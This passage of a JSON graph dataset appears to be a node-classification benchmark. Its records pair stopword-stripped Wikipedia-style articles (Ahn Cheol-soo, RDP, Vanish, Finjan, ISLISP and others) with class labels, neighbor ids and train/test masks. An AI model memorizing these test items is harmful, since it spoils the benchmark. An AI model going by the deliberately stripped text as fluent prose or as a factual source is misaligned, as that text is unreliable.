alongside kim han-gil ahn kim resigned position three months later july following new party disappointing performance by-elections year seen liberals lose seat jeolla conservatives first time 26 years ahn remained npad came increasing conflict moon jae-in taken sole leadership party resignation pro-roh faction moon represented december 2015 ahn issued ultimatum moon demanding convention held beginning 2016 elect new party leader moon rejected demand ahn left npad along range lawmakers opposed moon including kim han-gil announcing would form new party subsequently joined forces chun jung-bae left party earlier year form people party january 2016 moon resigned leader ahn defection describing experience series difficult days without single one respite ahn positioned new people party anti-establishment centrist force attracting support political wings labeled remaining npad anachronistic progressives accused contemporary korean politicians lacking policies beyond short-term gimmicks lead-up april 13 parliamentary election came conflict co-leader chun members party kim chong-in interim leader democratic party npad successor called two parties form electoral alliance kim han-gil ahn co-leader chun supported plan ahn rejected prospect alliance former party proposal ultimately scotched kim han-gil withdrawing upcoming election protest event people party performed better anticipated coming second party-list voting winning 38 seats overall including 23 28 districts liberal stronghold jeolla people party held balance power new assembly establishing three-party system ahn credited victory seen giving position kingmaker support contesting presidential elections following year following election ahn rejected continued calls regroup minjoo party stating would inappropriate speak politically realigning point time added people party would mere tie-breaking third party ... new opinion leader parliamentary affairs ahn widely known likely contender 2017 south korean presidential election selected people party nominee defeating sohn hak-kyu park joo-sun despite rapid increase opinion polling briefly bypassed moon jae-in ahn floundered tv debates led loss finishing third field five total candidates underperformance presidential campaign party scandal found people party members fabricating evidence smear moon jae-in campaign led ahn declare july 2017 apologize take step back politics self-reflection returned month later run later win party chairmanship head people party ahn strong advocate merging center-right bareun party two leaders respective parties ahn former presidential contender yoo seung-min pushed forward merger completed february 2018 although yoo retained leadership position within new party ahn stepped leadership role march 2018 took role leading party talent recruiting committee formal position speculated signal preparation run seoul mayorship later year ahn stated considers franklin d. roosevelt role model referred bernie sanders korea supports increased capital gains tax higher public welfare spending cautious approach free trade agreements ahn also made appeals conservatives however associated people party reformative currents korean conservatism september 2012 ahn visited graves syngman rhee park chung-hee kim dae-jung park rhee often praised korean conservatives kim liberals ahn stated time would hypocritical paint half people enemies time call 'unity ahn considered palatable conservative voters part due business background ahn among first opposed american deployment terminal high altitude area defense system commonly referred thaad alongside moon jae-in however changed stance suggesting irresponsible future president reverse agreement already made united states korea ahn stated opposes legalization same-sex marriage although detailed article broadcasting network sbs website said same-sex marriage needs achieved social discussion december 2011 ahn expressed willingness donate half shares ahnlab education children low-income families owns 37.1 percent ahnlab shares 9 december 2011 value shares donated 250 billion 218 million september 2012 ahn made public apology reports surfaced wife evaded taxes under-pricing 2001 apartment bought worth ₩450 million ₩250 million thus reducing acquisition registration taxes ₩10 million however statement korea taxpayers association claimed contract accordance trade customs thus unlawful due flaws local tax law 1996 2005 1988 married kim mi-kyung currently professor seoul national university college medicine ahn daughter kim",
    "neighbors": [
      704,
      2213,
      1355,
      4475,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10741,
    "label": 4,
    "text": "Vanish_(computer_science):vanish computer science vanish project give users control lifetime personal data stored web led roxana geambasu university washington project proposes allow user enter information send across internet thereby relinquishing control however user able include expiration date information longer usable anyone may copy even creator vanish approach found vulnerable sybil attack thus insecure team called unvanish university texas university michigan princeton vanish acts automating encryption information entered user encryption key unknown user along actual information user enters also enters metadata concerning long information remain available system encrypts information store either encryption key original information instead breaks decryption key smaller components disseminated across distributed hash tables dhts via internet dhts refresh information within nodes set schedule unless told persist information time-delay entered user metadata controls long dhts allow information persist time period dhts reuse nodes making information decryption stored irretrievable long decryption key may reassembled dhts information retrievable however time initially entered user lapsed information recoverable user never informed decryption key vanish currently exists firefox plug-in allows user enter text either standard gmail email facebook message choose send message via vanish message encrypted sent via normal networking pathways cloud recipient recipient must firefox plug-in decrypt message plugin accesses bittorrent dhts 8-hour lifespans means user may select expiration date message increments 8 hours expiration user-defined time span information dht overwritten thereby eliminating key user recipient may copies original encrypted message key used turn back plain text gone although particular instance data become inaccessible important note information always saved means expiration copied even via screen shots published",
    "neighbors": [
      7600,
      4380,
      5078
    ],
    "mask": "Test"
  },
  {
    "node_id": 10742,
    "label": 7,
    "text": "CITIC_Telecom_CPC:citic telecom cpc citic telecom international cpc limited formerly known psinet hk cpcnet wholly owned subsidiary citic telecom international holdings limited technological company involved managed cloud computing ip networking information security data center services company owns operates computing security networking facilities communications linkages in-country local sales offices 2016 citic telecom cpc extended global reach acquiring linx telecommunication b.v. linx telecommunications became one first asian ict service providers points-of-presence along “ one belt one road ” infrastructure framework including amsterdam frankfurt warsaw vilnius lithuania stockholm helsinki finland saint petersburg russia moscow tallinn estonia riga latvia kiev ukraine budapest hungary almaty kazakhstan tibilisi georgia baku azerbaijan locations citic pacific acquired psinet hk 2001 following year psinet hk renamed cpcnet subsequently renamed “ citic telecom cpc ” six 6 points-of-presence beijing shanghai guangzhou shenzhen hong kong taiwan citic telecom cpc began providing mpls vpn services hong kong taiwan companies business operations mainland china 2006 citic telecom cpc launched information security services year citic telecom cpc expanded presence greater china south-east asia 2010 citic telecom international holdings limited acquired china enterprise ict solutions limited citic telecom cpc 2011 cloud computing solution launched 2011 cpcnet renamed citic telecom international cpc limited citic telecom cpc became one first vmware vcloud ® powered service providers greater china 2016 saw citic telecom cpc commence acquired acquiring linx telecommunications linx telecommunication b.v. renamed merged company citic telecom cpc europe acquisition extended citic telecom cpc global infrastructure points-of-presence central asia central eastern europe markets including regions encompassed china “ one belt one road ” economic cooperation initiative 2017 citic telecom cpc also became first iaas provider receive new cloud-centric iso27017 certification hong kong citic telecom cpc thus became first asian managed services provider points-of-presence across multitude countries along new “ digital silk road ” including amsterdam frankfurt warsaw vilnius lithuania stockholm helsinki finland saint petersburg russia moscow tallinn estonia riga latvia kiev ukraine budapest hungary almaty kazakhstan tibilisi georgia baku azerbaijan locations acquisition expanded citic telecom cpc global footprint asia pacific north america western europe encompass central asia eastern europe parent company citic telecom international holdings limited hkse 1883 ict service provider asia pacific subsidiary company china enterprise ict solutions limited “ china entercom ” “ cec ” founded 2000 information communications technology ict service provider china",
    "neighbors": [
      4194,
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 10743,
    "label": 0,
    "text": "Voice_activity_detection:voice activity detection voice activity detection vad also known speech activity detection speech detection technique used speech processing presence absence human speech detected main uses vad speech coding speech recognition facilitate speech processing also used deactivate processes non-speech section audio session avoid unnecessary coding/transmission silence packets voice internet protocol applications saving computation network bandwidth vad important enabling technology variety speech-based applications therefore various vad algorithms developed provide varying features compromises latency sensitivity accuracy computational cost vad algorithms also provide analysis example whether speech voiced unvoiced sustained voice activity detection usually language independent first investigated use time-assignment speech interpolation tasi systems typical design vad algorithm follows may feedback sequence vad decision used improve noise estimate noise reduction stage adaptively vary threshold feedback operations improve vad performance non-stationary noise i.e noise varies lot representative set recently published vad methods formulates decision rule frame frame basis using instantaneous measures divergence distance speech noise different measures used vad methods include spectral slope correlation coefficients log likelihood ratio cepstral weighted cepstral modified distance measures independently choice vad algorithm must compromise voice detected noise noise detected voice false positive false negative vad operating mobile phone must able detect speech presence range diverse types acoustic background noise difficult detection conditions often preferable vad fail-safe indicating speech detected decision doubt lower chance losing speech segments biggest difficulty detection speech environment low signal-to-noise ratios snrs encountered may impossible distinguish speech noise using simple level detection techniques parts speech utterance buried noise wide range applications digital mobile radio digital simultaneous voice data dsvd speech storage desirable provide discontinuous transmission speech-coding parameters advantages include lower average power consumption mobile handsets higher average bit rate simultaneous services like data transmission higher capacity storage chips however improvement depends mainly percentage pauses speech reliability vad used detect intervals one hand advantageous low percentage speech activity hand clipping loss milliseconds active speech minimized preserve quality crucial problem vad algorithm heavy noise conditions one controversial application vad conjunction predictive dialers used telemarketing firms order maximize agent productivity telemarketing firms set predictive dialers call numbers agents available knowing calls end either “ ring – answer ” answering machines person answers typically speak briefly “ hello ” “ good evening ” etc brief period silence answering machine messages usually contain 3–15 seconds continuous speech setting vad parameters correctly dialers determine whether person machine answered call person transfer call available agent detects answering machine dialer hangs often system correctly detects person answering call agent available leaves called party frustratedly repeating “ hello hello ” phone combined volume agents get created impetus develop “ call ” lists across us evaluate vad output using test recordings compared “ ideal ” vad – created hand-annotating presence/absence voice recordings performance vad commonly evaluated basis following four parameters although method described provides useful objective information concerning performance vad approximate measure subjective effect example effects speech signal clipping times hidden presence background noise depending model chosen comfort noise synthesis clipping measured objective tests reality audible therefore important carry subjective tests vads main aim ensure clipping perceived acceptable kind test requires certain number listeners judge recordings containing processing results vads tested listeners give marks following features marks obtained listening several speech sequences used calculate average results features listed thus providing global estimate behavior vad tested conclude whereas objective methods useful initial stage evaluate quality vad subjective methods significant however expensive since require participation certain number people days generally used proposal standardized",
    "neighbors": [
      7834,
      10557,
      3165
    ],
    "mask": "None"
  },
  {
    "node_id": 10744,
    "label": 9,
    "text": "AtScript:atscript atscript proposed javascript-based scripting language extending microsoft typescript transcompiling javascript introduced october 2014 ng-europe conference developers google angularjs web development framework language upcoming angular 2.0 would built atscript originally intended run top typescript including features dart october 2014 google announced angular 2.0 would written atscript march 2015 microsoft announced many atscript features would implemented typescript 1.5 release angular 2.0 would built pure typescript name “ atscript ” comes “ ” symbol used annotations many languages",
    "neighbors": [
      8068,
      3462,
      6791,
      1802,
      6154,
      8605,
      6176,
      1698,
      803,
      5031,
      1203,
      9780,
      438,
      4920,
      1470,
      7871,
      5311,
      5067,
      339,
      4056,
      9560,
      9561,
      8923,
      8289,
      482,
      9195,
      5101,
      10991,
      10739
    ],
    "mask": "Test"
  },
  {
    "node_id": 10745,
    "label": 4,
    "text": "Finjan:finjan finjan holdings finjan publicly traded company nasdaq fnjn centers licensing intellectual property finjan claims patented technology used enterprise web security solutions finjan filed large number lawsuits leading software security companies asserting patents including cisco palo alto networks symantec blue coat systems sophos trend micro eset bitdefender check point qualys rapid7 fortinet others finjan named patent troll original hardware software divisions finjan acquired m86 security 2009 finjan continues hold patents various web security technologies licenses patents trustwave formerly m86 among others finjan commitment innovation security space continues investments culminated recent launch finjan consulting services business cyberisk development mobile applications consumer subsidiary finjan mobile incubation up-and-coming technology startups pioneering new generation security technologies company investment jerusalem venture partners jvp fund vii cyber labs invested alongside companies like cisco technology companies company headquartered east palo alto california finjan founded 1997 shlomo touboul serial entrepreneur founded first company shani computers 1985 sold intel 1994 worked intel starting finjan 1998 touboul decided bring experienced seasoned ceo would able develop grow company quickly left start venture capital fund 2001 company ran financial difficulties touboul asked board directors rejoin company ceo touboul realigned company strategy moving away developing software solutions combined hardware software security appliances additionally company moved channel sales model december 2002 finjan acquired assets alchemedia software developer drm product called clever content several drm patents alchemedia also ties israel founder daniel schreiber israeli though company technically headquartered dallas area 2005 following disagreements board touboul left started new company yoggie security systems october 2007 eric benhamou former ceo chairman 3com appointed chairman finjan also invested company venture capital fund benhamou global ventures november 2009 hardware software divisions finjan sold m86 security global computer security firm based orange california international headquarters london offices worldwide m86 subsequently acquired trustwave still use finjan technology patents licensing agreement finjan appliances sold trustwave secure web gateway june 2013 finjan became publicly traded company capitalized 30m installed new management team began focused program license company landmark intellectual property may 2014 finjan listed nasdaq capital market trading symbol fnjn continue trade today finjan initial shareholders included cisco microsoft bessemer venture partners benchmark capital harbourvest partners israel seed partners november 2008 company secured additional investment 22m brought total capital invested finjan since founding 67 million june 2013 finjan became publicly traded company capitalized 30m installed new management team began focused program license company landmark intellectual property may 2014 finjan listed nasdaq capital market trading symbol fnjn finjan claims invented concept proactive content security behavior-based content analysis technology claim shared others selected technology patents licensed microsoft july 2005 april 2009 finjan intellectual property portfolio included granted pending patents areas behavior-based security digital rights management finjan portfolio includes processes enable networks execute security plans counteract effects polymorphic code designed hide malware",
    "neighbors": [
      3520,
      4471,
      9569,
      131,
      4487,
      7851,
      3116,
      10574,
      1907,
      9055,
      119,
      10166,
      11577,
      9215,
      8668,
      127
    ],
    "mask": "Train"
  },
  {
    "node_id": 10746,
    "label": 3,
    "text": "Re-order_buffer:re-order buffer re-order buffer rob used tomasulo algorithm out-of-order instruction execution allows instructions committed in-order normally three stages instructions issue execute write result tomasulo algorithm additional stage commit stage results instructions stored register memory write result stage results put re-order buffer contents buffer used executing instructions depending additional fields every entry buffer additional benefits re-order buffer include precise exceptions easy rollback control target address mispredictions branch jump rob works storing instructions original fetched order rob also accessed side since reservation station tomasulo algorithm additional parameter points instruction rob jump prediction correct nonrecoverable exception encountered instruction stream rob cleared instructions reservation stations re-initialized",
    "neighbors": [
      7173,
      9739,
      7699,
      5655,
      27,
      10779,
      10781,
      8231,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      5329,
      10966,
      731,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      1798,
      6926,
      6415,
      1298,
      6950,
      4909,
      309,
      8501,
      5948,
      4928,
      8514,
      6476,
      7505,
      9044,
      11604,
      3421,
      8543,
      1376,
      10603,
      4465,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5523,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      3014,
      466,
      9174,
      1499,
      1502,
      5090,
      995,
      7653,
      9707,
      8684,
      10734,
      6639,
      499,
      4596,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 10747,
    "label": 5,
    "text": "Remote_Desktop_Protocol:remote desktop protocol remote desktop protocol rdp proprietary protocol developed microsoft provides user graphical interface connect another computer network connection user employs rdp client software purpose computer must run rdp server software clients exist versions microsoft windows including windows mobile linux unix macos ios android operating systems rdp servers built windows operating systems rdp server unix os x also exists default server listens tcp port 3389 udp port 3389 microsoft currently refers official rdp client software remote desktop connection formerly terminal services client protocol extension itu-t t.128 application sharing protocol every version microsoft windows windows xp onwards includes installed remote desktop connection rdc terminal services client mstsc.exe whose version determined operating system last applied windows service pack terminal services server supported official feature windows nt 4.0 terminal server edition windows 2000 server editions windows xp except windows xp home edition windows server 2003 windows home server windows fundamentals legacy pcs windows vista ultimate enterprise business editions windows server 2008 windows server 2008 r2 windows 7 professional microsoft provides client required connecting newer rdp versions downlevel operating systems since server improvements available downlevel features introduced newer rdp version work downlevel operating systems connecting higher version rdp server older operating systems using rdp server older operating system based itu-t t.128 application sharing protocol draft also known t.share t.120 recommendation series first version rdp named version 4.0 introduced microsoft terminal services part product windows nt 4.0 server terminal server edition terminal services edition nt 4.0 relied citrix multiwin technology previously provided part citrix winframe atop windows nt 3.51 order support multiple users login sessions simultaneously microsoft required citrix license multiwin technology microsoft order allowed continue offering terminal-services product named citrix metaframe atop windows nt 4.0 citrix-provided dlls included windows nt 4.0 terminal services edition still carry citrix copyright rather microsoft copyright later versions windows integrated necessary support directly t.128 application sharing technology acquired microsoft uk software developer data connection limited version introduced windows 2000 server added support number features including printing local printers aimed improve network bandwidth usage version introduced windows xp professional included support 24-bit color sound client available windows 2000 windows 9x windows nt 4.0 version name client changed terminal services client remote desktop connection heritage remains day however underlying executable still named mstsc.exe version introduced windows server 2003 included support console mode connections session directory local resource mapping also introduces transport layer security tls 1.0 server authentication encrypt terminal server communications version built windows xp professional x64 edition windows server 2003 x64 x86 editions version introduced windows vista incorporated support windows presentation foundation applications network level authentication multi-monitor spanning large desktop support tls 1.0 connections version 6.0 client available windows xp sp2 windows server 2003 sp1/sp2 x86 x64 editions windows xp professional x64 edition microsoft remote desktop connection client macintosh os x also available support intel powerpc mac os versions 10.4.9 greater server 2012 support rdc 6.0 later version released february 2008 included windows server 2008 well windows vista service pack 1 client included windows xp sp3 addition changes related remote administrator connects console version new functionality introduced windows server 2008 connecting remotely individual programs new client-side printer redirection system makes client print capabilities available applications running server without install print drivers server version released manufacturing july 2009 included windows server 2008 r2 well windows 7 release also changed terminal services remote desktop services version new functions windows media player redirection bidirectional audio multi-monitor support aero glass support enhanced bitmap acceleration easy print redirection language bar docking rdp 7.0 client available windows xp sp3 windows vista sp1/sp2 kb969084 rdp 6.1 client rdp 7.0 client supported windows server 2003 x86 windows server 2003 windows xp professional x64 editions rdp 7.0 also supported windows server 2008 rdp 7.0 clients also support connecting terminal servers running windows 2000 server rdp 7.0 features like aero glass remote use bidirectional audio windows media player redirection multiple monitor support remote desktop easy print available windows 7 enterprise ultimate editions release 7.1 rdp included windows 7 service pack 1 windows server 2008 r2 sp1 2010 introduced remotefx provides virtualized gpu support host-side encoding version released windows 8 windows server 2012 version new functions adaptive graphics progressive rendering related techniques automatic selection tcp udp transport protocol multi touch support directx 11 support vgpu usb redirection supported independently vgpu support etc connection quality button displayed rdp client connection bar rdp 8.0 connections clicking provides information connection including whether udp use rdp 8.0 client server components also available add-on windows 7 sp1 rdp 8.0 client also available windows server 2008 r2 sp1 server components add-on requires dtls protocol installed prerequisite installing updates rdp 8.0 protocol enabled windows 7 machines extra configuration step needed using group policy editor new feature rdp 8.0 limited support rdp session nesting works windows 8 server 2012 though windows 7 server 2008 r2 even rdp 8.0 update support feature shadow feature rdp 7 allowed administrator monitor snoop rdp connection removed rdp 8 aero glass remoting feature applicable windows 7 machines connecting also removed rdp 8 version released windows 8.1 windows server 2012 r2 rdp 8.1 client update exists windows 7 sp1 well unlike rdp 8.0 update windows 7 add rdp 8.1 server component windows 7 furthermore rdp 8.0 server function desired windows 7 kb 2592687 rdp 8.0 client server components update must installed installing rdp 8.1 update support session shadowing added back rdp version 8.1 version also fixes visual glitches microsoft office 2013 running remoteapp version 8.1 rdp also enables restricted admin mode logging mode requires knowledge hashed password rather plaintext therefore making pass hash attack possible microsoft released 82-page document explaining mitigate type attack version 10.0 rdp includes following new features autosize zoom useful hidpi clients addition graphics compression improvements included utilizing h.264/avc microsoft introduced following features release rdp 6.0 2006 release 7.1 rdp 2010 introduced following feature version 5.2 rdp default configuration vulnerable man-in-the-middle attack administrators enable transport layer encryption mitigate risk rdp sessions also susceptible in-memory credential harvesting used launch pass hash attacks march 2012 microsoft released update critical security vulnerability rdp vulnerability allowed windows computer compromised unauthenticated clients computer worms rdp client version 6.1 used reveal names pictures users rdp server matter windows version order pick one username specified rdp connection march 2018 microsoft released patch remote code execution vulnerability credssp security support provider involved microsoft remote desktop windows remote management discovered preempt may 2019 microsoft issued security patch bluekeep vulnerability allows possibility remote code execution microsoft warned wormable potential cause widespread disruption unusually patches also made available several versions windows reached end-of-life windows xp immediate malicious exploitation followed experts unanimous likely could cause widespread harm based number systems appeared remained exposed unpatched july 2019 microsoft issued security patch rdp vulnerability affects hyper-v numerous non-microsoft implementations rdp clients servers implement subsets microsoft functionality instance open-source command-line client rdesktop available linux/unix microsoft windows operating systems many gui clients like tsclient krdc built top rdesktop cord client macintosh 2009 rdesktop forked freerdp new project aiming modularizing code addressing various issues implementing new features freerdp comes command-line-client xfreerdp supports seamless windows rdp6 ’ also gtk-application named remmina open-source implementation remote desktop protocol server unix freerdp xrdp windows remote desktop connection client used connect server proprietary rdp client solutions rdpclient available stand-alone application embedded client hardware new access paradigm browser-based access enabled users access windows desktops applications rdp hosts microsoft remote desktop rds session hosts terminal services virtual desktops well remote physical pcs also so-called vrdp used virtualbox virtual machine implementation oracle protocol compatible rdp clients provided windows unlike original rdp configured accept unencrypted password unprotected connections may useful secure trusted networks home office lans default microsoft rdp server refuses connections user accounts empty passwords changed group policy editor external guest authorization options provided vrdp well matter operating system installed guest vrdp implemented virtual machine host level guest system proprietary virtualbox extension pack required microsoft requires third-party implementations license relevant rdp patents extent open-source clients meet requirement remains unknown security researchers reported cybercriminals selling compromised rdp servers underground forums well specialized illicit rdp shops compromised rdps may used staging ground conducting types fraud access sensitive personal corporate data researchers report instances cybercriminals using rdps directly drop malware computers",
    "neighbors": [
      8576,
      771,
      6150,
      4235,
      6797,
      4240,
      8080,
      8466,
      2196,
      2709,
      5652,
      7188,
      11413,
      2713,
      3867,
      3868,
      2041,
      9505,
      4771,
      6436,
      11301,
      7207,
      10924,
      7983,
      1970,
      3250,
      5682,
      823,
      9655,
      6204,
      6972,
      6462,
      1348,
      4552,
      1098,
      6993,
      9173,
      11097,
      6622,
      9441,
      6114,
      7523,
      10341,
      9705,
      4074,
      8315,
      4977,
      5492,
      4597,
      4729,
      5371,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 10748,
    "label": 5,
    "text": "SIMPLE_(instant_messaging_protocol):simple instant messaging protocol simple session initiation protocol instant messaging presence leveraging extensions instant messaging im presence protocol suite based session initiation protocol sip managed internet engineering task force contrary vast majority im presence protocols used software deployed today simple open standard like xmpp simple applies sip problems implementations simple based protocols found sip softphones also sip hardphones simple presence specifications broken sip defines two modes instant messaging",
    "neighbors": [
      10242,
      5251,
      3460,
      5382,
      3847,
      649,
      4746,
      1036,
      9868,
      11408,
      3218,
      9365,
      10005,
      11413,
      3610,
      5402,
      3228,
      5531,
      3742,
      10271,
      3105,
      9380,
      2085,
      9381,
      3751,
      3752,
      9511,
      1962,
      10924,
      9519,
      562,
      2996,
      9909,
      8758,
      1467,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      1218,
      6208,
      7364,
      6982,
      2887,
      2760,
      6855,
      1738,
      8265,
      2892,
      2509,
      9670,
      4687,
      5843,
      3284,
      2904,
      5469,
      4318,
      479,
      5470,
      5471,
      5472,
      3812,
      4068,
      6628,
      9572,
      10341,
      10344,
      11112,
      367,
      8432,
      3959,
      7928,
      6651,
      9725
    ],
    "mask": "None"
  },
  {
    "node_id": 10749,
    "label": 3,
    "text": "Toshiba_T3100:toshiba t3100 t3100 laptop manufactured toshiba released 1986 featured hard drive 8 mhz intel 80286 cpu black orange 9.6 gas-plasma display resolution 640x400 pixels laptop time special high-resolution 640 x 400 display mode similar partially compatible olivetti/at 6300 graphics single proprietary expansion slot 1200 bit/s modem expansion chassis 5x 8-bit isa cards ethernet nic 2400 bit/s modem 1 mb memory card thus 3.6 mb max total base model 1mb memory could upgraded 5mb toshiba t3100 true portable needed external power source except last version five versions existed japan japanese version t3100 marketed j-3100 byte 1989 listed t3100/20 among distinction winners byte awards citing amazingly clear display hard drive",
    "neighbors": [
      10273,
      6311,
      11657,
      9166,
      7983,
      1776,
      6004,
      1141,
      859
    ],
    "mask": "Test"
  },
  {
    "node_id": 10750,
    "label": 9,
    "text": "TI_Extended_BASIC:ti extended basic ti extended basic discontinued implementation basic programming language interpreter texas instruments ti-99/4a home computer ti produced extended basic cartridge greatly enhanced functionality accessible ti basic users sprites could generated set move automatically simple one-line commands custom call subprograms access memory expansion larger programs multiple statement lines statement separator boolean logic statements assembly language linkage well ability display text location screen added largely retaining compatibility ti basic equipped ti speech synthesizer ti extended basic users could also generate speech predefined vocabulary easily writing text on-screen example following line text entered command-line prompt would cause speech synthesizer identify computer multi-word phrases delimited symbol codice_1 example using word included speech synthesizer built-in vocabulary 338 words phrases would cause slowly spell word ti terminal emulator ii cartridge provided text-to-speech functionality ti extended basic also provided raw access speech synthesizer developers resources generate speech data function rarely used ti extended basic several statements present ti basic accept image linput break error warning sub subend subexit",
    "neighbors": [
      3718,
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      3233,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      8262,
      712,
      3533,
      847,
      2383,
      1879,
      477,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 10751,
    "label": 6,
    "text": "Briefcase_(Microsoft_Windows):briefcase microsoft windows microsoft windows briefcase special folder supports simple two-way file synchronization another folder briefcase designed mobile pc users may transfer removable drive synchronize computer removable drive attached follows metaphor file file folder file management tasks performed windows explorer briefcase behaves like another folder i.e support copy-paste drag-and-drop additional functions toolbar buttons updating out-of-sync files windows briefcase introduced windows 95 windows briefcase synchronizes files folders within folder even removable writable media network intended users portable media multiple computers use briefcase users need use windows explorer drag copy files briefcase changes either files disk briefcase synchronized whenever user right-clicks briefcase selects update differences copies briefcase shows dialog box icon description indicating action take synchronizing whether replace copy briefcase external file vice versa action briefcase take configurable right clicking icon example users skip synchronizing individual items selecting skip action upon right clicking icon items deleted either briefcase main original folder briefcase create copy missing item users also sync individual items briefcase selecting item first clicking update button instead update update status item stored briefcase item link original item outside briefcase example drive containing briefcase inserted secondary computer original deleted main computer called orphan special folders windows briefcase folders hidden file system attribute called desktop.ini may also windows registry entries describing desktop.ini briefcase contains following lines second file called briefcase database bearing hidden system attributes filename extension serves briefcase index fourcc ddsh briefcase folder must read-only system file attributes default read-only order display briefcase desktop.ini briefcase database files required hidden system attributes order parent folder display briefcase user wishes sync file one another folder filename must exactly item renamed moved splits original longer synchronized becomes orphan item deleted associated copy default deleted well using update briefcase medium becomes full update space writing updated briefcase database effect making many folders files orphans easy way restore link counterparts source medium limitations others make briefcase files brittle easily corrupted limits robustness folder file backup mechanism",
    "neighbors": [
      2432,
      3330,
      5158,
      5225,
      6797,
      9819,
      9694
    ],
    "mask": "Test"
  },
  {
    "node_id": 10752,
    "label": 9,
    "text": "ISLISP:islisp islisp also capitalized islisp programming language lisp family standardized international organization standardization iso international electrotechnical commission iec joint working group iso/iec jtc 1/sc 22/wg 16 commonly termed simply sc22/wg16 wg16 primary output working group international standard published iso standard updated 2007 republished iso/iec 13816:2007 e although official publication iso versions islisp language specification available believed public domain goal standards effort define small core language help bridge gap differing dialects lisp attempted accomplish goal studying primarily common lisp eulisp le lisp scheme standardizing features shared islisp design goals islisp separate function variable namespaces hence lisp-2 islisp object system ilos mostly subset common lisp object system clos islisp implementations made many operating systems including windows unix posix based linux macos freebsd openbsd netbsd solaris hp-ux aix cygwin qnx android dos os/2 pocket pc openvms z/os implementations hardware computer architectures include x86 x86-64 ia-64 sparc sparc9 powerpc mips alpha pa-risc arm aarch64 two older implementations longer available",
    "neighbors": [
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      5149,
      9245,
      8226,
      5677,
      3119,
      3126,
      1079,
      2105,
      3132,
      6717,
      7234,
      8258,
      8771,
      3142,
      8262,
      1610,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      9320,
      2666,
      5751,
      2168,
      7805,
      9345,
      1159,
      9865,
      6797,
      9877,
      8854,
      2206,
      5803,
      10413,
      2225,
      5816,
      6840,
      7867,
      4799,
      7880,
      8904,
      8908,
      205,
      5837,
      9932,
      5852,
      10463,
      7392,
      7904,
      11488,
      8421,
      11495,
      8426,
      5356,
      9964,
      4846,
      5360,
      5361,
      8944,
      8435,
      9969,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      10510,
      1301,
      791,
      1304,
      10012,
      3869,
      11036,
      2335,
      2849,
      5413,
      7981,
      7983,
      2352,
      11056,
      10547,
      823,
      311,
      6969,
      6977,
      5961,
      8524,
      3408,
      6994,
      1365,
      2392,
      2904,
      10586,
      10083,
      6502,
      11625,
      5492,
      3446,
      3447,
      1399,
      377,
      10104,
      4992,
      3462,
      7562,
      1931,
      1435,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      9151,
      7616,
      5569,
      6594,
      4550,
      11218,
      11219,
      5588,
      10712,
      4057,
      3034,
      7134,
      4064,
      4069,
      3051,
      5611,
      5614,
      1010,
      499,
      9714,
      7670,
      11255,
      8700,
      2045,
      10238
    ],
    "mask": "None"
  },
  {
    "node_id": 10753,
    "label": 2,
    "text": "Joseph_Henry_Condon:joseph henry condon joseph henry 'joe condon born february 15 1935 january 2 2012 american computer scientist engineer physicist spent career bell labs son edward condon distinguished american nuclear physicist pioneer quantum mechanics participant development radar nuclear weapons world war ii part manhattan project emilie honzik condon named 19th century american physicist joseph henry condon developed interest physics electronics early age credited introduction analytical thinking anonymous instrument maker attended johns hopkins university received bs degree physics 1958 northwestern university received ph.d. physics 1963 graduate school condon joined metallurgy research division bell laboratories murray hill new jersey arrived time division split formerly physics metallurgy chemistry one executive director split physics director chemistry metallurgy another worked five years solid-state physics metals low temperatures electronic band structure metals means oscillatory diamagnetic susceptibility de haas–van alphen effect studies beryllium silver 19661968 showed magnetic domains later called 'condon domains form non-ferromagnetic metals oscillating differential magnetic susceptibility greater unity developed theory verified experimentally condon became interested electronics engineering moving physics exposed unix honeywell 516 machines early 1970s 1960s condon contributed development local area network digital telephone switching condon ken thompson promoted use c programming language switching system control programs condon acquired small pbx telephone switch handled 50 phones made necessary hardware changes thompson wrote necessary software programs pbx code rewrite c success hastened adoption c switching system software within circa 19681969 condon head department 13 owned pdp-7 computer computer loaned dennis ritchie ken thompson used create famous early computer game space travel port various features recently cancelled multics project developments directly led development unix operating system modern derivatives 1975 condon joined computer research center bell labs c programming language unix operating system created condon colleagues automated laborious error-prone task manually converting drawings fabricate circuit boards system unix circuit design system ucds enabling rapid prototyping collaboration thompson condon created chess-playing machine belle condon designed custom hardware ken designed software 1982 condon collaborated andrew ogielski create spin glass machine single-purpose computer 5-10 times faster cray-1 designed facilitate monte carlo calculations theoretical physicists determine properties class recently discovered complex magnetic materials spin glasses various random antiferromagnets thus combining interests digital systems physics condon obituary physics today called work spin glass machine classic remain accurate day despite immense increases computing power condon retired 1989 continued consult bell labs another 10 years condon died january 2 2012 joe said natural teacher drew deep understanding physics explaining problem either basic physics digital design addition unlimited curiosity extensive knowledge delightful sense humor designs said parsimonious personal interests included american indian crafts classical music theater travel wife carol rv quaker frequent volunteer fish hospitality program local charity providing shelter homeless people single mothers",
    "neighbors": [
      6772,
      9507,
      5492,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10754,
    "label": 2,
